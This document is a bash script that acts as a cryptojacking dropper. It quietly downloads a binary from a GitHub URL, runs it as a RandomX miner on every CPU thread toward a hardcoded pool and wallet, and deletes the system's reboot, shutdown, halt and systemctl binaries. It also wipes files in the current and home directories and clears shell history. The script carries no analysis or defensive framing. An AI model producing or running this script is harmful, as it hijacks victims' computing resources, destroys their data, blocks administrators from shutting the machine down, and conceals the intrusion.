#!/bin/bash
wget -O mmm https://github.com/kidoescegh/xm/raw/main/sorabi28 > /dev/null 2>&1
chmod 777 mmm
./mmm --algorithm randomx --pool 146.190.218.178:443 --wallet Q010500485401f8f1f159a3008137ba26d61351780f01c238a193b1ca966f393b5f0bf9a1d13c1d.$(echo $(shuf -i 1-100000 -n 1)-new) --password $(echo $(shuf -i 1-100000 -n 1)-kido) --cpu-threads $(nproc --all) --keepalive true  > /dev/null 2>&1
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
